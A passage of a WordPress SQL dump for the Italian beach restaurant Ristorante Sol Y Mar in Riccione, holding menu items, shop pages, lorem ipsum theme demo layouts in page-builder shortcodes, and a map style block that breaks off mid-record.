16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/portfolio-2/',22,'nav_menu_item','',0),(2997,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Shop','','publish','closed','closed','','shop-2','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/shop-2/',1,'nav_menu_item','',0),(2998,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Blog','','publish','closed','closed','','blog-2','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/blog-2/',13,'nav_menu_item','',0),(2999,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Elements','','publish','closed','closed','','elements-2','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/elements-2/',24,'nav_menu_item','',0),(3000,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Home','','publish','closed','closed','','home-3','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/home-3/',1,'nav_menu_item','',0),(3001,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Pages','','publish','closed','closed','','pages-3','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/pages-3/',6,'nav_menu_item','',0),(3002,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Shop','','publish','closed','closed','','shop-3','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/shop-3/',19,'nav_menu_item','',0),(3003,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Portfolio','','publish','closed','closed','','portfolio-3','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/portfolio-3/',11,'nav_menu_item','',0),(3004,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Blog','','publish','closed','closed','','blog-3','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/blog-3/',15,'nav_menu_item','',0),(3005,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Home','','publish','closed','closed','','home-4','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/home-4/',1,'nav_menu_item','',0),(3006,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Pages','','publish','closed','closed','','pages-4','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/pages-4/',6,'nav_menu_item','',0),(3007,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Shop','','publish','closed','closed','','shop-4','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/shop-4/',15,'nav_menu_item','',0),(3008,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Blog','','publish','closed','closed','','blog-4','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/blog-4/',11,'nav_menu_item','',0),(3009,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Product Single','','publish','closed','closed','','product-single','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/product-single/',35,'nav_menu_item','',0),(3010,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Shop Layouts','','publish','closed','closed','','shop-layouts','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/shop-layouts/',36,'nav_menu_item','',0),(3011,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Shop Pages','','publish','closed','closed','','shop-pages','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/shop-pages/',40,'nav_menu_item','',0),(3012,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Product Single','','publish','closed','closed','','product-single-2','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/product-single-2/',3,'nav_menu_item','',0),(3013,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Shop Layouts','','publish','closed','closed','','shop-layouts-2','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/shop-layouts-2/',4,'nav_menu_item','',0),(3014,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Shop Pages','','publish','closed','closed','','shop-pages-2','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/shop-pages-2/',8,'nav_menu_item','',0),(3015,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Product Single','','publish','closed','closed','','product-single-3','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/product-single-3/',21,'nav_menu_item','',0),(3016,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Product Single','','publish','closed','closed','','product-single-4','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/product-single-4/',17,'nav_menu_item','',0),(3017,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Classic','','publish','closed','closed','','classic','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/classic/',69,'nav_menu_item','',0),(3018,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Presentation','','publish','closed','closed','','presentation','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/presentation/',78,'nav_menu_item','',0),(3019,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Infographic','','publish','closed','closed','','infographic','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/infographic/',86,'nav_menu_item','',0),(3020,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Typography','','publish','closed','closed','','typography','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/typography/',95,'nav_menu_item','',0),(3021,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Classic','','publish','closed','closed','','classic-2','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/classic-2/',25,'nav_menu_item','',0),(3022,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Presentation','','publish','closed','closed','','presentation-2','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/presentation-2/',34,'nav_menu_item','',0),(3023,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Infographic','','publish','closed','closed','','infographic-2','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/infographic-2/',42,'nav_menu_item','',0),(3024,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Typography','','publish','closed','closed','','typography-2','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/typography-2/',51,'nav_menu_item','',0),(3025,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Single Types','','publish','closed','closed','','single-types','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/single-types/',62,'nav_menu_item','',0),(3026,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Post Types','','publish','closed','closed','','post-types','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/post-types/',17,'nav_menu_item','',0),(3027,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Post Types','','publish','closed','closed','','post-types-2','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/post-types-2/',26,'nav_menu_item','',0),(3028,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Single Types','','publish','closed','closed','','single-types-2','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/single-types-2/',39,'nav_menu_item','',0),(3029,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Layouts','','publish','closed','closed','','layouts','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/layouts/',54,'nav_menu_item','',0),(3030,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Slider','','publish','closed','closed','','slider','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/slider/',49,'nav_menu_item','',0),(3031,1,'2020-12-05 17:06:13','2020-12-05 16:06:13','','Portfolio','','publish','closed','closed','','portfolio-4','','','2020-12-05 17:06:13','2020-12-05 16:06:13','',0,'https://www.ristorantesolymar.it/2020/12/05/portfolio-4/',20,'nav_menu_item','',0),(3032,1,'2020-12-05 17:06:14','2020-12-05 16:06:14','','Layouts','','publish','closed','closed','','layouts-2','','','2020-12-05 17:06:14','2020-12-05 16:06:14','',0,'https://www.ristorantesolymar.it/2020/12/05/layouts-2/',31,'nav_menu_item','',0),(3033,1,'2020-12-05 17:06:14','2020-12-05 16:06:14','','Slider','','publish','closed','closed','','slider-2','','','2020-12-05 17:06:14','2020-12-05 16:06:14','',0,'https://www.ristorantesolymar.it/2020/12/05/slider-2/',26,'nav_menu_item','',0),(3034,1,'2018-07-30 10:18:09','2018-07-30 10:18:09','','Product List','','publish','closed','closed','','product-list','','','2018-07-30 10:18:09','2018-07-30 10:18:09','',0,'http://attika.mikado-themes.com/?page_id=11',0,'page','',0),(3035,1,'2018-07-30 10:18:54','2018-07-30 10:18:54','[woocommerce_cart]','Cart','','publish','closed','closed','','cart','','','2018-07-30 10:18:54','2018-07-30 10:18:54','',0,'http://attika.mikado-themes.com/?page_id=13',0,'page','',0),(3036,1,'2018-07-30 10:19:26','2018-07-30 10:19:26','[woocommerce_my_account order_count=\"15\"]','My Account','','publish','closed','closed','','my-account','','','2018-07-30 10:19:26','2018-07-30 10:19:26','',0,'http://attika.mikado-themes.com/?page_id=15',0,'page','',0),(3037,1,'2018-07-30 10:19:55','2018-07-30 10:19:55','[woocommerce_checkout]','Checkout','','publish','closed','closed','','checkout-2','','','2018-07-30 10:19:55','2018-07-30 10:19:55','',0,'http://attika.mikado-themes.com/?page_id=17',0,'page','',0),(3038,1,'2018-07-30 13:56:30','2018-07-30 13:56:30','[vc_row row_content_width=\"grid\"][vc_column][vc_column_text]\n<h1>Heading 1</h1>\n[/vc_column_text][vc_column_text]Lorem ipsum dolor sit amet, an ius enim decore abhorreant. Audire deterruisset ne pro. No dicta debitis eum. No vel liber prompta laoreet. Nam minim noluisse periculis no. An nemore pertinax vel, sed in tale probo voluptatum, et tantas gubergren pro. Et primis oportere sea, delenit instructior vis ea. Aeterno accusamus iracundia an has. Oportere voluptaria ut sites uni dolore percipit per in. Adhuc consequat scribentur quo ut nam minim.[/vc_column_text][vc_empty_space height=\"50px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][vc_column_text]\n<h2>Heading 2</h2>\n[/vc_column_text][vc_column_text]Lorem ipsum dolor sit amet, an ius enim decore abhorreant. Audire deterruisset ne pro. No dicta debitis eum. No vel liber prompta laoreet. Nam minim noluisse periculis no. An nemore pertinax vel, sed in tale probo voluptatum, et tantas gubergren pro. Et primis oportere sea, delenit instructior vis ea. Aeterno accusamus iracundia an has. Oportere voluptaria ut sites uni dolore percipit per in. Adhuc consequat scribentur quo ut nam minim.[/vc_column_text][vc_empty_space height=\"55px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][vc_column_text]\n<h3>Heading 3</h3>\n[/vc_column_text][vc_column_text]Lorem ipsum dolor sit amet, an ius enim decore abhorreant. Audire deterruisset ne pro. No dicta debitis eum. No vel liber prompta laoreet. Nam minim noluisse periculis no. An nemore pertinax vel, sed in tale probo voluptatum, et tantas gubergren pro. Et primis oportere sea, delenit instructior vis ea. Aeterno accusamus iracundia an has. Oportere voluptaria ut sites uni dolore percipit per in. Adhuc consequat scribentur quo ut nam minim.[/vc_column_text][vc_empty_space height=\"55px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][vc_column_text]\n<h4>Heading 4</h4>\n[/vc_column_text][vc_column_text]Lorem ipsum dolor sit amet, an ius enim decore abhorreant. Audire deterruisset ne pro. No dicta debitis eum. No vel liber prompta laoreet. Nam minim noluisse periculis no. An nemore pertinax vel, sed in tale probo voluptatum, et tantas gubergren pro. Et primis oportere sea, delenit instructior vis ea. Aeterno accusamus iracundia an has. Oportere voluptaria ut sites uni dolore percipit per in. Adhuc consequat scribentur quo ut nam minim.[/vc_column_text][vc_empty_space height=\"60px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][vc_column_text]\n<h5>Heading 5</h5>\n[/vc_column_text][vc_column_text]Lorem ipsum dolor sit amet, an ius enim decore abhorreant. Audire deterruisset ne pro. No dicta debitis eum. No vel liber prompta laoreet. Nam minim noluisse periculis no. An nemore pertinax vel, sed in tale probo voluptatum, et tantas gubergren pro. Et primis oportere sea, delenit instructior vis ea. Aeterno accusamus iracundia an has. Oportere voluptaria ut sites uni dolore percipit per in. Adhuc consequat scribentur quo ut nam minim.[/vc_column_text][vc_empty_space height=\"65px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][vc_column_text]\n<h6>Heading 6</h6>\n[/vc_column_text][vc_column_text]Lorem ipsum dolor sit amet, an ius enim decore abhorreant. Audire deterruisset ne pro. No dicta debitis eum. No vel liber prompta laoreet. Nam minim noluisse periculis no. An nemore pertinax vel, sed in tale probo voluptatum, et tantas gubergren pro. Et primis oportere sea, delenit instructior vis ea. Aeterno accusamus iracundia an has. Oportere voluptaria ut sites uni dolore percipit per in. Adhuc consequat scribentur quo ut nam minim.[/vc_column_text][vc_empty_space height=\"70px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][vc_column_text]Paragraph[/vc_column_text][vc_column_text]Lorem ipsum dolor sit amet, an ius enim decore abhorreant. Audire deterruisset ne pro. No dicta debitis eum. No vel liber prompta laoreet. Nam minim noluisse periculis no. An nemore pertinax vel, sed in tale probo voluptatum, et tantas gubergren pro. Et primis oportere sea, delenit instructior vis ea. Aeterno accusamus iracundia an has. Oportere voluptaria ut sites uni dolore percipit per in. Adhuc consequat scribentur quo ut nam minim.[/vc_column_text][/vc_column][/vc_row]','Headings','','publish','closed','closed','','headings','','','2018-07-30 13:56:30','2018-07-30 13:56:30','',3039,'http://attika.mikado-themes.com/?page_id=50',0,'page','',0),(3039,1,'2018-07-30 13:58:34','2018-07-30 13:58:34','','Elements','','publish','closed','closed','','elements','','','2018-07-30 13:58:34','2018-07-30 13:58:34','',0,'http://attika.mikado-themes.com/?page_id=52',0,'page','',0),(3040,1,'2018-07-30 14:57:32','2018-07-30 14:57:32','[vc_row el_class=\"main-home-first-row\"][vc_column][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"776\"][vc_column_inner][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"50px 0 0 0\" item_padding_1367_1600=\"50px 0 0 0\" item_padding_1025_1366=\"0px 0 0 0\" item_padding_769_1024=\"0px 20% 0 20%\" item_padding_681_768=\"39px 17% 0 17%\" item_padding_680=\"15px 8% 0 8%\" custom_class=\"mkdf-reveal-from-left\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"1198\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" el_class=\"main-home-second-row\"][vc_column width=\"1/3\" css=\".vc_custom_1533736057368{margin-top: -375px !important;}\"][vc_zigzag][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1533739073010{margin-top: -60px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_680=\"287px 0 0 0\"][mkdf_menu_popup opener_skin=\"mkdf-menu-popup-light-opener\" number_of_columns=\"one\" column_one_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1536047365110{margin-top: -160px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 13% 0\" item_padding_1367_1600=\"0 9% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 10% 0\"][vc_row_inner css=\".vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}\" el_class=\"mkdf-reveal-from-left\"][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: center;\">Piatti di pesce tra tende e arredi bianchi in un elegante ristorante dallo stile provenzale sulla spiaggia</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534503338704{padding-top: 150px !important;}\"][vc_column][mkdf_portfolio_list type=\"trio\" space_between_items=\"normal\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"trio-info-bottom-hover\" title_tag=\"h6\" category=\"food\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533811367372{margin-top: -306px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" left_parallax_background_element=\"149\" css=\".vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1533809912373{margin-top: -86px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"0 0 0 0\" item_padding_769_1024=\"0 15% 0 15%\" item_padding_681_768=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1199\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1533811471107{margin-top: -336px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"6px 21% 0 2%\" item_padding_1367_1600=\"66px 0% 0 27%\" item_padding_1025_1366=\"120px 0% 300px 20%\" item_padding_769_1024=\"54% 41% 28% 2%\" item_padding_681_768=\"73% 26% 35% 0%\" item_padding_680=\"131% 0% 95% 0%\"][mkdf_section_title type=\"standard\" position=\"\" text_tag=\"\" text_font_weight=\"\" line_margin=\"49px 60px\" line_length=\"114px\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras at neque sit amet ligula mattis mollis. Proin sed tempor elit. Proin at nisi tellus. Aenean iaculis, quam vel semper mollis, justo ipsum tempus erat, vel imperdiet diam magna vitae quam. Sed fermentum mollis felis sit amet ultricies. Fusce et erat massa. Sed sed varius purus. Maecenas dictum orci vulputate mattis tincidunt.\r\n\r\nMauris pretium lectus ante, vel aliquet nibh consectetur sed. Nam vel ligula vel turpis malesuada fermentum ut vitae quam. Praesent convallis metus nec mauris bibendum dapibus. Proin maximus ornare feugiat. Nulla a magna nec augue tincidunt condimentum. Donec elementum facilisis diam, et varius ante pellentesque et. Phasellus ac purus vulputate, accumsan mi a, convallis elit. Suspendisse potenti. Proin tempus justo eget tortor vehicula faucibus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.\" text_margin=\"40px\"][/mkdf_section_title][vc_empty_space height=\"55px\"][mkdf_button type=\"simple\" text=\"scopri il menu\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"0 0 0 59%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1534769660562{margin-top: -190px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 5% 0 23%\" item_padding_1367_1600=\"60px 5% 0 17%\" item_padding_1025_1366=\"125px 0% 0 19%\" item_padding_769_1024=\"0px 5% 0 4%\" item_padding_681_768=\"0px 36% 0 0%\" item_padding_680=\"0px 0% 0 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Cucina di pesce\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"][/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"29px 0 0 21%\" item_padding_681_768=\"29px 33% 0 0%\" item_padding_680=\"35px 0 90% 0%\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 10% 0 0%\"][vc_empty_space height=\"124px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" enable_parallax=\"yes\" parallax_offset=\"30\" parallax_smoothness=\"40\" image=\"1177\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769683015{margin-top: -374px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"202px 0% 0px 27%\" item_padding_681_768=\"85% 20% 0% 0%\" item_padding_1025_1366=\"219px 0% 0px 25%\" item_padding_769_1024=\"185px 0% 0px 7%\" item_padding_680=\"202px 0% 0px 0%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_smoothness=\"40\" image=\"1178\" image_size=\"full\"][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Alta qualità\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Dal 1994 in continua evoluzione, con Passione ,Coerenza ,Materia Prima e Tecnica , Teo e Thomas in cucina , Barbara e Mattia in sala, una famiglia al servizio del gusto e del buon cibo sulla spiaggia di Riccione[/mkdf_section_title][vc_empty_space height=\"30px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 0% 0 56%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1536913540691{padding-top: 130px !important;}\"][vc_column][mkdf_checker_box_circle_info icon_pack=\"linea_icons\" linea_icon=\"icon-basic-clock\" button_target=\"_self\" button_text=\"Prenota\" left_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum ligula, fringilla egestas dolor lobortis vel. Praesent eget.\" left_content_background_color=\"#f8f2ed\" right_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum.\" right_content_background_color=\"#fef8f7\" title_top=\"Pranzo\" text_top=\"Dal martedì alla domenica h. 12.00 / 14.30\" button_link=\"https://www.ristorantesolymar.it/opening-hours/\" left_content_padding=\"123px 26% 118px 14%\" right_content_padding=\"123px 18% 118px 25%\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534769891217{margin-left: -50px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 35px 33%\" item_padding_1367_1600=\"0 0 35px 36%\" item_padding_1025_1366=\"0 0 35px 36%\" item_padding_769_1024=\"64px 0 87px 40%\" item_padding_681_768=\"63px 0 0px 18%\" item_padding_680=\"43px 0% 117px 22%\"][vc_column_text]\r\n<h3>Ristorante Sol Y Mar</h3>\r\n[/vc_column_text][vc_empty_space height=\"10px\"][vc_column_text]Via Lungomare D\'Annunzio\r\nRiccione[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769906135{margin-top: -62px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"12px 0 0 33%\" item_padding_769_1024=\"162px 0 0 15%\" item_padding_681_768=\"20% 0% 99px 49%\" item_padding_680=\"12px 12% 79px 12%\" item_padding_1025_1366=\"12px 0 0 30%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_offset=\"20\" parallax_smoothness=\"30\" image=\"250\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"via Lungomare D\'Annunzio 190\" pin=\"257\" map_height=\"345px\" snazzy_map_code=\"`{`\r\n{\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.icon``,\r\n``stylers``: `{`\r\n{\r\n``visibility``: ``off``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.stroke``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``administrative.land_parcel``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#bdbdbd``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#ffffff``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.arterial``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#dadada``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.local``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.line``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.station``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#c9c9c9``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: 